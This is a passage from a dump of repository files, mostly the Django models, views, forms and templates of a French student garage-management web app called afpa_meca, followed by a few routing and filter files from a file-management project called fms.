__str__(self):\n return str(self.vehicule) + \" \" + str(self.date_saisie_intervention) + \" \" + str(self.utilisateur) + \" \" + str(self.statut)\n\nclass Piece(models.Model):\n reference_piece = models.CharField(\"référence pièce\", blank=False, max_length=20)\n libelle_piece = models.CharField(\"libellé de la pièce\", blank=False, max_length=50)\n \n class Meta:\n verbose_name = \"Pièces\"\n verbose_name_plural = \"Pièces\"\n def __str__(self):\n return self.libelle_piece\n\n\nclass Fournisseur(models.Model):\n libelle_fournisseur = models.CharField(\"Nom Fournisseur\", blank=False, max_length=35)\n piece_fournisseur = models.ManyToManyField(Piece, through='Piece_Fournisseur_Devis')\n \n def __str__(self):\n return self.libelle_fournisseur\n\n\nclass Devis(models.Model):\n def NumeroDevis():\n num = Devis.objects.count()\n if num == None:\n return 1\n else:\n return num +1\n\n numero_devis = models.IntegerField(unique=True, default=NumeroDevis )\n date_devis = models.DateField(\"Date du devis\", blank=False, null=False)\n devis_signe_img = models.ImageField(\"Scan du devis signé\", null=True, blank=True, upload_to =\"img/devis\")\n \n ValidationFormateur = 'VF'\n AttenteFormateur = 'AF'\n RefusFormateur = 'RF'\n ValidationClient ='VC'\n AttenteClient = 'AC'\n RefusClient = 'RC'\n \n Statut_choice = (\n (ValidationFormateur, 'ValidationFormateur'),\n (AttenteFormateur, 'AttenteFormateur'),\n (RefusFormateur, 'RefusFormateur'),\n (ValidationClient,'ValidationClient'),\n (AttenteClient, 'AttenteClient'),\n (RefusClient, 'RefusClient'),\n )\n statut = models.CharField(\n max_length = 20,\n choices = Statut_choice,\n default = AttenteFormateur,\n )\n\n#cléfs de relations\n commande_fournisseur = models.ManyToManyField(Fournisseur, through='Piece_Fournisseur_Devis')\n commande_piece = models.ManyToManyField(Piece, through='Piece_Fournisseur_Devis')\n intervention = models.ForeignKey(Intervention, on_delete=models.CASCADE)\n\n class Meta():\n verbose_name_plural = \"Devis\"\n def __str__(self):\n return str(self.numero_devis)\n\n\nclass Piece_Fournisseur_Devis(models.Model):\n quantite_pieces_necessaires = models.IntegerField(\"Quantité de pièces nécessaires\", blank=False, null=True, default=1)\n prix_ht = models.IntegerField(\"Prix Hors Taxes\", null=True, blank=False)\n numero_devis_fournisseur = models.CharField(\"Numéro du devis fournisseur\", max_length=20, null=True, blank=False)\n \n#cléfs de relations\n devis = models.ForeignKey(Devis, null=True, on_delete=models.CASCADE)\n fournisseur = models.ForeignKey(Fournisseur, null=True, on_delete=models.CASCADE)\n piece = models.ForeignKey(Piece, null=True, on_delete=models.CASCADE)\n\n class Meta():\n verbose_name = \"Commande\"\n verbose_name_plural = \"Commandes\"\n def __str__(self):\n return str(self.fournisseur) + \" devis n°\" +str(self.devis) + \" pièce : \" + str(self.piece)\n\n"
},
{
"alpha_fraction": 0.7956204414367676,
"alphanum_fraction": 0.7956204414367676,
"avg_line_length": 33,
"blob_id": "002ab0f697c7e43af697c3f66d51c47db8a993aa",
"content_id": "59b2d19273b6a2cc41045b0dd4c9f8ef948c5b8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 4,
"path": "/README.md",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "# afpa_meca\nProjet application web Pôle mécanique AFPA\nPre-requis : pip install Pillow sur l'environnement Django \npseudo Gaetan : Gama\n\n"
},
{
"alpha_fraction": 0.5762310028076172,
"alphanum_fraction": 0.578551173210144,
"avg_line_length": 38.338741302490234,
"blob_id": "135b9b0acbd629b811d98839173de27f4ed1d988",
"content_id": "2311a6033254af6003f96cc7abed5365799648db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19414,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 493,
"path": "/garage/views.py",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse\nfrom .models import *\nfrom django.views.generic import TemplateView\nfrom django.shortcuts import render, get_object_or_404, redirect, reverse\nfrom .forms import *\nfrom django.views.generic import CreateView, UpdateView, ListView, View, FormView, DetailView\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse_lazy\nfrom . import urls\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth import logout\nfrom django.db import DatabaseError, transaction\nfrom django.core.exceptions import ValidationError\n\n\ndef accueil(request):\n return render(request, 'garage/accueil.html')\nclass Accueil(TemplateView):\n template_name = 'garage/accueil.html'\n\n def get_context_data(self, **kwargs):\n context = super(Accueil, self).get_context_data(**kwargs)\n context['liste_interventions'] = Intervention.objects.filter(utilisateur=self.request.user)\n return context\n\n\nclass ClientCreateView(View):\n def getForm(self, request):\n zipCode_form = ZipCodeForm(request.POST or None)\n city_form = CityForm(request.POST or None)\n address_form = AddressForm(request.POST or None) \n client_form = ClientForm(request.POST or None) \n donneesPersonnelles_form = DonneesPersonnellesForm(request.POST or None)\n\n return { 'client_form': client_form,\n 'donneesPersonnelles_form': donneesPersonnelles_form,\n 'address_form' : address_form,\n 'city_form' : city_form,\n 'zipCode_form' : zipCode_form\n }\n \n def get(self, request):\n myTemplate_name = 'garage/client_form.html'\n return render(request, myTemplate_name, self.getForm( request ) )\n\n @transaction.atomic\n def post(self, request):\n try:\n modelFormError = \"\"\n with transaction.atomic():\n dico = self.getForm( request )\n \n zipCode_form = dico['zipCode_form']\n if not zipCode_form.is_valid():\n modelFormError = \"Une erreur interne est apparue sur le code postal. Merci de recommencer votre saisie.\" \n raise ValidationError(modelFormError)\n else :\n try:\n zip_code = zipCode_form.cleaned_data['zip_code']\n codepostal = ZipCode.objects.filter(zip_code=zip_code)\n if not codepostal.exists():\n zipCode = zipCode_form.save() \n else :\n zipCode = codepostal[0]\n\n except DatabaseError: \n modelFormError = \"Problème de connection à la base de données\" \n raise \n\n city_form = dico['city_form']\n if not city_form.is_valid():\n modelFormError = \"Une erreur interne est apparue sur la ville. Merci de recommencer votre saisie.\" \n raise ValidationError(modelFormError)\n else :\n try:\n city_name = city_form.cleaned_data['city_name'] \n ville = City.objects.filter(city_name=city_name)\n if not ville.exists():\n city = city_form.save() \n else :\n city = ville[0]\n\n city.zip_codes.add(zipCode)\n city.save()\n\n except DatabaseError: \n modelFormError = \"Problème de connection à la base de données\" \n raise \n\n address_form = dico['address_form'] \n if not address_form.is_valid(): \n modelFormError = \"Une erreur interne est apparue sur l'adresse. Merci de recommencer votre saisie.\" \n raise ValidationError(modelFormError)\n else :\n try:\n address = address_form.save(commit=False)\n address.zipCode = zipCode\n address.city = city\n address.save()\n\n except DatabaseError: \n modelFormError = \"Problème de connection à la base de données\" \n raise \n\n\n donneesPersonnelles_form = dico['donneesPersonnelles_form'] \n if not donneesPersonnelles_form.is_valid():\n modelFormError = \"Une erreur interne est apparue sur les données personnelles. Merci de recommencer votre saisie.\" \n raise ValidationError(modelFormError)\n else :\n donnees = donneesPersonnelles_form.save() \n\n\n client_form = dico['client_form'] \n if not client_form.is_valid():\n modelFormError = \"Une erreur interne est apparue sur les données clients. Merci de recommencer votre saisie.\" \n raise ValidationError(modelFormError)\n else :\n try:\n client = client_form.save(commit=False)\n client.donnees_personnelles_client = donnees\n client.adresse = address\n client.save() \n context = {'client_id':client.id}\n\n except DatabaseError: \n modelFormError = \"Problème de connection à la base de données\" \n raise \n \n return redirect(\"garage:voiture-create\", context['client_id'])\n\n except (ValidationError, DatabaseError):\n dicoError = self.getForm( request )\n dicoError ['internal_error'] = modelFormError\n return render(request, 'garage/client_form.html', dicoError )\n \n return render(request, 'garage/client_form.html', self.getForm( request ) )\n\nclass ClientUpdate(UpdateView):\n template_name = 'garage/client_update.html'\n success_message = \"Données mises à jour avec succès\"\n\n def get(self, request, *args, **kwargs):\n client = Client.objects.get(pk=self.kwargs['pk'])\n address = client.adresse\n zipCode = address.zipCode\n city = address.city\n donneesPersonnelles = client.donnees_personnelles_client\n form = ZipCodeForm(instance=zipCode)\n form2 = CityForm(instance=city)\n form3 = AddressUpdateForm(instance=address)\n form4 = DonneesPersonnellesUpdateForm(instance=donneesPersonnelles)\n form5 = ClientForm(instance=client)\n\n context = {'form': form, 'form2': form2, 'form3': form3, 'form4': form4, 'form5': form5, }\n return render(request, self.template_name, context)\n\n def post (self, request, *args, **kwargs):\n client = Client.objects.get(pk=self.kwargs['pk'])\n address = client.adresse\n zipCode = address.zipCode\n city = address.city\n donneesPersonnelles = client.donnees_personnelles_client\n\n form = ZipCodeForm(request.POST, instance=zipCode)\n form2 = CityForm(request.POST, instance=city)\n form3 = AddressUpdateForm(request.POST, instance=address)\n form4 = DonneesPersonnellesUpdateForm(request.POST, instance=donneesPersonnelles)\n form5 = ClientForm(request.POST, instance=client)\n\n if form.is_valid() and form2.is_valid() and form3.is_valid() and form4.is_valid() and form5.is_valid(): \n zipCodeData = form.save(commit=False) \n cityData = form2.save(commit=False)\n addressData = form3.save(commit=False)\n donneesPersosData = form4.save(commit=False)\n clientData = form5.save(commit=False)\n \n cityData.save()\n addressData.city = cityData\n\n zipCodeData.save()\n addressData.zipCode = zipCodeData\n\n addressData.save()\n clientData.adresse = addressData\n\n donneesPersosData.save()\n clientData.donnees_personnelles_client = donneesPersosData\n\n clientData.save()\n return redirect('garage:clients')\n context = {'form': form, 'form2': form2, 'form3': form3, 'form4': form4, 'form5': form5, }\n return render(request, self.template_name, context)\n\n def get_context_data(self, **kwargs):\n\n client = Client.objects.filter(pk=self.kwargs['pk'])\n address = client.adresse\n zipCode = address.zipCode\n city = address.city\n donneesPersonnelles = client.donnees_personnelles_client\n context = super(ClientUpdate, self).get_context_data(**kwargs)\n if 'form' not in context:\n context['form'] = self.form_class(instance=zipCode)\n if 'form2' not in context:\n context['form2'] = self.second_form(instance=city)\n if 'form3' not in context:\n context['form3'] = self.third_form(instance=address)\n if 'form4' not in context:\n context['form4'] = self.fourth_form(instance=donneesPersonnelles)\n if 'form5' not in context:\n context['form5'] = self.fifth_form(instance=client)\n return context \n\nclass ClientSelect(ListView):\n model = Client\n template_name = \"garage/client-select.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_client'] = self.get_queryset()\n return context\n\nclass Clients(ClientSelect):\n template_name = \"garage/clients.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\nclass VoitureCreate(CreateView):\n form_class = VoitureForm\n template_name = 'garage/voiture_form.html'\n\n def get_success_url(self, **kwargs):\n\n return reverse_lazy('garage:intervention-create',\n kwargs={'vehicule_id': self.object.id},\n current_app='garage')\n\n def form_valid(self, form):\n client = Client.objects.get(pk=self.kwargs['client_id'])\n voiture = form.save()\n voiture.client = client\n voiture.save()\n voiture.type_vehicule = \"Voiture\"\n voiture.save()\n return super().form_valid(form)\n\n\nclass MotoCreate(CreateView):\n form_class = MotoForm\n template_name = 'garage/moto_form.html'\n\n def get_success_url(self, **kwargs):\n return reverse_lazy('garage:intervention-create',\n kwargs={'vehicule_id': self.object.id},\n current_app='garage')\n\n def form_valid(self, form):\n client = Client.objects.get(pk=self.kwargs['client_id'])\n moto = form.save()\n moto.type_vehicule = \"Moto\"\n moto.client = client\n moto.save()\n return super().form_valid(form)\n\nclass VeloCreate(CreateView):\n form_class = VeloForm\n template_name = 'garage/velo_form.html'\n\n def get_success_url(self, **kwargs):\n return reverse_lazy('garage:intervention-create',\n kwargs={'vehicule_id': self.object.id},\n current_app='garage')\n\n def form_valid(self, form):\n client = Client.objects.get(pk=self.kwargs['client_id'])\n velo = form.save()\n velo.type_vehicule = \"Velo\"\n velo.client = client\n velo.save()\n return super().form_valid(form)\n\n\nclass VoitureUpdate(UpdateView):\n model = Voiture\n template_name = 'garage/voiture_update.html'\n form_class = VoitureForm\n success_url = reverse_lazy('garage:voitures')\n\n def my_url(self):\n pass\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_interventions'] = Intervention.objects.filter(vehicule=self.kwargs['pk'])\n return context\n\nclass MotoUpdate(UpdateView):\n model = Moto\n template_name = 'garage/moto_update.html'\n form_class = MotoForm\n success_url = reverse_lazy('garage:voitures')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_interventions'] = Intervention.objects.filter(vehicule=self.kwargs['pk'])\n return context\n\nclass VeloUpdate(UpdateView):\n model = Velo\n template_name = 'garage/velo_update.html'\n form_class = VeloForm\n success_url = reverse_lazy('garage:velos')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_interventions'] = Intervention.objects.filter(vehicule=self.kwargs['pk'])\n return context\n\n\nclass VehiculeSelect(ListView):\n model = Voiture\n template_name = 'garage/voiture-select.html'\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_vehicule'] = self.get_queryset()\n context['voiture_id'] = None\n context['curent_model'] = \"Voiture\"\n if self.template_name == 'garage/voiture-select.html':\n client = Client.objects.get(pk=self.kwargs['client_id'])\n context['client'] = client\n return context\n \n def get_queryset(self):\n return Voiture.objects.filter(client_id=self.kwargs['client_id'])\n\nclass MotoSelect(VehiculeSelect):\n model = Moto\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_vehicule'] = self.get_queryset()\n context['curent_model'] = \"Moto\"\n return context\n\n def get_queryset(self):\n return Moto.objects.filter(client_id=self.kwargs['client_id'])\n\nclass VeloSelect(VehiculeSelect):\n model = Velo\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_vehicule'] = self.get_queryset()\n context['curent_model'] = \"Velo\"\n return context\n\n def get_queryset(self):\n return Velo.objects.filter(client_id=self.kwargs['client_id'])\n\n\nclass VehiculeList(VehiculeSelect):\n template_name = 'garage/vehicules.html'\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['curent_model'] = \"Voiture\"\n return context\n \n def get_queryset(self):\n return Voiture.objects.all()\n\nclass MotoList(VehiculeSelect):\n template_name = 'garage/vehicules.html'\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['curent_model'] = \"Moto\"\n return context\n \n def get_queryset(self):\n return Moto.objects.all()\n\nclass VeloList(VehiculeSelect):\n template_name = 'garage/vehicules.html'\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['curent_model'] = \"Velo\"\n return context\n \n def get_queryset(self):\n return Velo.objects.all()\n\n\nclass InterventionCreate(CreateView):\n form_class = InterventionForm\n template_name = 'garage/ordre_reparation.html' \n def get_success_url(self, **kwargs):\n\n return reverse_lazy('garage:accueil',\n current_app='garage')\n\n def form_valid(self, form):\n if Vehicule.objects.get(pk=self.kwargs['vehicule_id']).type_vehicule == \"Voiture\":\n vehicule = Voiture.objects.get(pk=self.kwargs['vehicule_id'])\n\n elif Vehicule.objects.get(pk=self.kwargs['vehicule_id']).type_vehicule == \"Moto\":\n vehicule = Moto.objects.get(pk=self.kwargs['vehicule_id'])\n\n elif Vehicule.objects.get(pk=self.kwargs['vehicule_id']).type_vehicule == \"Velo\":\n vehicule = Velo.objects.get(pk=self.kwargs['vehicule_id'])\n \n user = self.request.user\n\n intervention = form.save(commit=False)\n intervention.utilisateur = user\n intervention.vehicule = vehicule\n\n intervention.save()\n return super().form_valid(form)\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n if Vehicule.objects.get(pk=self.kwargs['vehicule_id']).type_vehicule == \"Voiture\":\n vehicule = Voiture.objects.get(pk=self.kwargs['vehicule_id'])\n\n elif Vehicule.objects.get(pk=self.kwargs['vehicule_id']).type_vehicule == \"Moto\":\n vehicule = Moto.objects.get(pk=self.kwargs['vehicule_id'])\n\n elif Vehicule.objects.get(pk=self.kwargs['vehicule_id']).type_vehicule == \"Velo\":\n vehicule = Velo.objects.get(pk=self.kwargs['vehicule_id'])\n \n context['vehicule'] = vehicule \n return context\n\nclass InterventionSelect(ListView):\n model = Intervention\n template_name = \"garage/intervention-select.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_interventions'] = self.get_queryset()\n return context\n\nclass Interventions(InterventionSelect):\n template_name = \"garage/interventions.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\nclass InterventionUpdate(UpdateView):\n model = Intervention\n form_class = InterventionForm\n template_name = 'garage/ordre_reparation.html' \n success_url = reverse_lazy('garage:interventions')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n intervention = Intervention.objects.get(pk=self.kwargs['pk'])\n if intervention.vehicule.type_vehicule == \"Voiture\":\n vehicule = Voiture.objects.get(pk=intervention.vehicule)\n\n elif intervention.vehicule.type_vehicule == \"Moto\":\n vehicule = Moto.objects.get(pk=intervention.vehicule)\n\n elif intervention.vehicule.type_vehicule == \"Velo\":\n vehicule = Velo.objects.get(pk=intervention.vehicule)\n\n context['vehicule'] = vehicule \n return context \n\ndef recherche(request):\n query = request.GET.get('query')\n if not query:\n clients = Client.objects.all()\n else:\n # nom_client contains the query is and query is not sensitive to case.\n clients = Client.objects.filter(nom_client__icontains=query)\n title = \"Résultats pour la requête %s\"%query\n context = {\n 'context_object_name': clients\n }\n return render(request, 'garage/recherche.html', context) \n \ndef ChoixVehicule(request):\n pass\n\n"
},
{
"alpha_fraction": 0.5941901206970215,
"alphanum_fraction": 0.5941901206970215,
"avg_line_length": 40.45255661010742,
"blob_id": "c3c8449479c620cc7f3efb9e412ac9bd7dc3d890",
"content_id": "a7046e98a82921e6ee58bb1d82341bc89046ec1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5690,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 137,
"path": "/garage/forms.py",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom django.forms import ModelForm, TextInput, EmailInput, SelectDateWidget, FileInput, NumberInput, DateInput, Textarea\nfrom django.forms.utils import ErrorList\nfrom .models import *\n\nclass ClientForm(forms.ModelForm):\n class Meta:\n model = Client\n # fields = '__all__'\n fields = [\"nom_client\", \"prenom_client\", \"numero_afpa_client\"]\n widgets = {\n 'nom_client': TextInput(attrs={'class': 'form-control'}),\n 'prenom_client': TextInput(attrs={'class': 'form-control'}),\n 'numero_afpa_client': NumberInput(attrs={'class': 'form-control'})\n }\n\nclass DonneesPersonnellesUpdateForm(forms.ModelForm):\n class Meta:\n model = DonneesPersonnelles\n fields = [\"mail_client\", \"telephone_client\",\"carte_AFPA_img\"]\n widgets = {\n 'mail_client': TextInput(attrs={'class': 'form-control'}),\n 'telephone_client': TextInput(attrs={'class': 'form-control'}),\n 'carte_AFPA_img': FileInput(attrs={'class': 'form-control'})\n } \n\nclass DonneesPersonnellesForm(forms.ModelForm):\n class Meta:\n model = DonneesPersonnelles\n fields = [\"mail_client\", \"telephone_client\",\"carte_AFPA_img\"]\n widgets = {\n 'mail_client': TextInput(attrs={'class': 'form-control'}),\n 'telephone_client': TextInput(attrs={'class': 'form-control'}),\n 'carte_AFPA_img': FileInput(attrs={'class': 'form-control'})\n } \n\n # Clean suivi du nom du champ concerné ensuite géré dans le Html\n def clean_mail_client(self):\n mail_client = self.cleaned_data['mail_client'].lower()\n r = DonneesPersonnelles.objects.filter(mail_client=mail_client)\n if r.count():\n raise forms.ValidationError(\"Email existe déjà\")\n return mail_client\n\nclass AddressUpdateForm(forms.ModelForm):\n class Meta:\n model = Address\n fields = [\"street\",\"street_number\",\"street_complement\"]\n widgets = {\n 'street': TextInput(attrs={'class': 'form-control'}),\n 'street_number': NumberInput(attrs={'class': 'form-control'}),\n 'street_complement': TextInput(attrs={'class': 'form-control'})\n }\n\nclass AddressForm(forms.ModelForm):\n class Meta:\n model = Address\n fields = [\"street\",\"street_number\",\"street_complement\"]\n widgets = {\n 'street': TextInput(attrs={'class': 'form-control'}),\n 'street_number': NumberInput(attrs={'class': 'form-control'}),\n 'street_complement': TextInput(attrs={'class': 'form-control'})\n }\n\n # Clean suivi du nom du champ concerné ensuite géré dans le Html\n def clean(self):\n cleaned_data = super().clean()\n street_number = self.cleaned_data['street_number']\n street = self.cleaned_data['street']\n r = Address.objects.filter(street_number=street_number,street=street)\n if r.count():\n raise forms.ValidationError(\"l'adresse existe déjà\")\n return cleaned_data\n\nclass ZipCodeForm(forms.ModelForm):\n class Meta:\n model = ZipCode\n fields = [\"zip_code\"]\n widgets = {\n 'zip_code': TextInput(attrs={'class': 'form-control'})\n } \n\nclass CityForm(forms.ModelForm):\n class Meta:\n model = City\n fields = [\"city_name\"]\n widgets = {\n 'city_name': TextInput(attrs={'class': 'form-control'})\n } \n\nclass VoitureForm(forms.ModelForm):\n class Meta:\n model = Voiture\n exclude = ('client', 'carte_grise_img', 'carte_assurance_img', 'type_vehicule' )\n widgets = {\n 'libelle_marque': TextInput(attrs={'class': 'form-control'}),\n 'libelle_modele': TextInput(attrs={'class': 'form-control'}),\n 'immatriculation': TextInput(attrs={'class': 'form-control'}),\n 'vin': TextInput(attrs={'class': 'form-control'}),\n 'kilometrage': NumberInput(attrs={'class': 'form-control'}),\n 'date_mec': DateInput(attrs={'class': 'form-control'}),\n 'carte_grise_img': FileInput(attrs={'class': 'form-control'}),\n 'carte_assurance_img': FileInput(attrs={'class': 'form-control'})\n }\n\nclass MotoForm(forms.ModelForm):\n class Meta:\n model = Moto\n exclude = ('client', 'carte_grise_img', 'carte_assurance_img', 'type_vehicule' )\n widgets = {\n 'libelle_marque': TextInput(attrs={'class': 'form-control'}),\n 'libelle_modele': TextInput(attrs={'class': 'form-control'}),\n 'immatriculation': TextInput(attrs={'class': 'form-control'}),\n 'vin': TextInput(attrs={'class': 'form-control'}),\n 'kilometrage': NumberInput(attrs={'class': 'form-control'}),\n 'date_mec': DateInput(attrs={'class': 'form-control'}),\n 'carte_grise_img': FileInput(attrs={'class': 'form-control'}),\n 'carte_assurance_img': FileInput(attrs={'class': 'form-control'})\n }\n\nclass VeloForm(forms.ModelForm):\n class Meta:\n model = Velo\n fields = ['libelle_modele']\n widgets = {\n 'libelle_modele': TextInput(attrs={'class': 'form-control'}),\n }\n\nclass InterventionForm(forms.ModelForm):\n class Meta:\n model = Intervention\n exclude = ('intervention_realisee', 'statut', 'utilisateur', 'vehicule', 'date_saisie_intervention')\n widgets = {\n 'date_restitution_prevu': DateInput(attrs={'class': 'form-control'}), \n 'diagnostic' : Textarea(attrs={'class': 'form-control'}), \n 'intervention_a_realiser' : Textarea(attrs={'class': 'form-control'}),\n }\n\n"
},
{
"alpha_fraction": 0.6800000071525574,
"alphanum_fraction": 0.6800000071525574,
"avg_line_length": 15.666666984558105,
"blob_id": "dedb5b74960437b2f221f807b7bbff6e1e9c762b",
"content_id": "868f57ab486e37f32b6904c7fddc6c9bcbda6a6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 3,
"path": "/afpa_meca/business_application.py",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "BUSINESS_APPLICATION = {\n 'VEHICULE': VOITURE\n}\n"
},
{
"alpha_fraction": 0.38135284185409546,
"alphanum_fraction": 0.3879341781139374,
"avg_line_length": 48.225223541259766,
"blob_id": "b4ee67b7425f733c67df4274b07734dd0f90f8bb",
"content_id": "6ea2a6cf5f6d282a6fcebc149e8096b9cc61b9eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 5474,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 111,
"path": "/garage/templates/garage/client_update.html",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "{% extends 'garage/base.html' %}\n{% load static %}\n\n{% block css %}\"{% static 'garage/css/client_form.css' %}\"{% endblock css %}\n\n{% block content %}\n <div class=\"container\">\n \n <titre class=\"col-md-12\">\n <div class=\"col-md-12\">\n <h1 id=\"titre\" class=\"title\">Consultation client</h1>\n </div>\n </titre>\n </br>\n \n <formulaire class=\"col-md-9\">\n <h4>Client</h4>\n <form class=\"needs-validation\" method=\"post\">\n {% csrf_token %}\n <div class=\"row\">\n <div class=\"col-md-6\">\n <div class=\"form-group {% if client_form.nom_client.errors %}has-warning has-feedback{% endif %}\">\n <label for=\"{{ client_form.nom_client.id_for_label }}\" class=\"control-label\">Nom</label>\n {{ form5.nom_client }}\n </div>\n <div class=\"invalid-feedback\">\n Saisie du nom est obligatoire\n </div>\n </div>\n <div class=\"col-md-6\">\n <div class=\"form-group {% if client_form.prenom_client.errors %}has-warning has-feedback{% endif %}\">\n <label for=\"{{ client_form.prenom_client.id_for_label }}\" class=\"control-label\">Prenom</label>\n {{ form5.prenom_client }}\n </div>\n <div class=\"invalid-feedback\">\n Saisie du prenom est obligatoire\n </div>\n </div>\n </div>\n\n <div class=\"row\">\n <div class=\"col-md-6\">\n <label for=\"{{ client_form.numero_afpa_client.id_for_label }}\" class=\"control-label\">Numéro carte AFPA</label>\n {{ form5.numero_afpa_client }}\n </div>\n <div class=\"col-md-6\">\n <label for=\"{{ form.telephone_client.id_for_label }}\" class=\"control-label\">Téléphone</label>\n {{ form4.telephone_client }}\n </div>\n <div class=\"col-md-6\">\n <label for=\"{{ form.mail_client.id_for_label }}\" class=\"control-label\">Email</label>\n {{ form4.mail_client }}\n <div> {{ form4.mail_client.errors }} </div>\n </div>\n </div> \n \n <div class=\"row\">\n <div class=\"col-md-2\">\n <label for=\"{{ address_form.street_number.id_for_label }}\" class=\"control-label\">Numéro de rue :</label>\n {{ form3.street_number }}\n </div>\n <div class=\"col-md-6\">\n <label for=\"{{ address_form.street.id_for_label }}\" class=\"control-label\">Adresse</label>\n {{ form3.street }}\n </div>\n <div class=\"col-md-4\">\n <label for=\"{{ address_form.street_complement.id_for_label }}\" class=\"control-label\">Complement d'adresse</label>\n {{ form3.street_complement }}\n </div>\n </div>\n <div class=\"row\">\n <div class=\"col-md-4\">\n <label for=\"{{ zipCode_form.zip_code.id_for_label }}\" class=\"control-label\">Code Postal</label>\n {{ form.zip_code }}\n </div>\n \n <div class=\"col-md-4\">\n <label for=\"{{ city_form.city_name.id_for_label }}\" class=\"control-label\">Ville</label>\n {{ form2.city_name }}\n </div>\n <div class=\"col-md-4\">\n <label for=\"{{ form.carte_AFPA_img.id_for_label }}\" class=\"control-label\">Carte AFPA img</label>\n {{ form4.carte_AFPA_img }}\n </div>\n </div>\n <div> {{ form3.non_field_errors }} </div>\n\n <div class=\"msgError\"> {{ internal_error }} </div> \n\n <div class=\"row\">\n <div class=\"col-md-3\">\n <a href=\"{% url 'garage:client-select' %}\" class=\"btn btn-primary btn-lg btn-block\" id=\"bouton\">Annuler</a>\n </div>\n <div class=\"col-md-2\">\n </div> \n <div class=\"col-md-4\">\n <button class=\"btn btn-primary btn-lg btn-block\" type=\"submit\" id=\"bouton\">Valider et retour Accueil</button>\n </div> \n <div class=\"col-md-3\">\n <button class=\"btn btn-primary btn-lg btn-block\" type=\"submit\" id=\"bouton\">Etape suivante</button>\n </div>\n </div> \n\n </form>\n\n\n\n </formulaire>\n\n </div>\n {% endblock content %}\n\n \n"
}
] | 8 |
disenQF/fms | https://github.com/disenQF/fms | 109888650d75d380d31cb17cc1a3afe56475a190 | 1a477208b283798f4aa4c8c9d30feb6a10736385 | 3520a97dfc40786387f5a33361d2d9296833b562 | refs/heads/master | 2021-06-30T19:56:36.363337 | 2020-03-09T05:31:14 | 2020-03-09T05:31:14 | 241,790,007 | 1 | 1 | null | 2020-02-20T04:07:59 | 2020-03-09T05:31:12 | 2021-06-10T22:37:11 | CSS | [
{
"alpha_fraction": 0.6395664215087891,
"alphanum_fraction": 0.6449864506721497,
"avg_line_length": 23.600000381469727,
"blob_id": "26d5989a445e0ad12518ebdd49d73813ced8269e",
"content_id": "03052d9f49cc14699ff30876b8426227bd6a3c32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 369,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 15,
"path": "/userapp/urls.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# coding: utf-8\nfrom django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('code/', views.send_code),\n path('regist/', views.RegistView.as_view()),\n path('files/', views.FileView.as_view()),\n path('download/', views.download),\n path('create_img_link/', views.create_image_link),\n path('show_img/', views.show_img),\n\n]\n"
},
{
"alpha_fraction": 0.6610169410705566,
"alphanum_fraction": 0.6836158037185669,
"avg_line_length": 18.77777862548828,
"blob_id": "8283696c0a056dba523fde0587a65f27fdadb367",
"content_id": "c095615509c3ee181fe0acad1341347263d6a225",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 177,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 9,
"path": "/fms/__init__.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "from django.template.defaultfilters import register\n\n\[email protected](is_safe=True)\ndef dot_info(value):\n if len(value)>10:\n return value[:10]+'...'\n\n return value"
},
{
"alpha_fraction": 0.5023255944252014,
"alphanum_fraction": 0.7023255825042725,
"avg_line_length": 16.91666603088379,
"blob_id": "ceb5ca506356d4790137f912fa0cc0b8df02b669",
"content_id": "92926fb0a39f891c0c212d0eeda115afd97a3eaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 215,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 12,
"path": "/requirements.txt",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
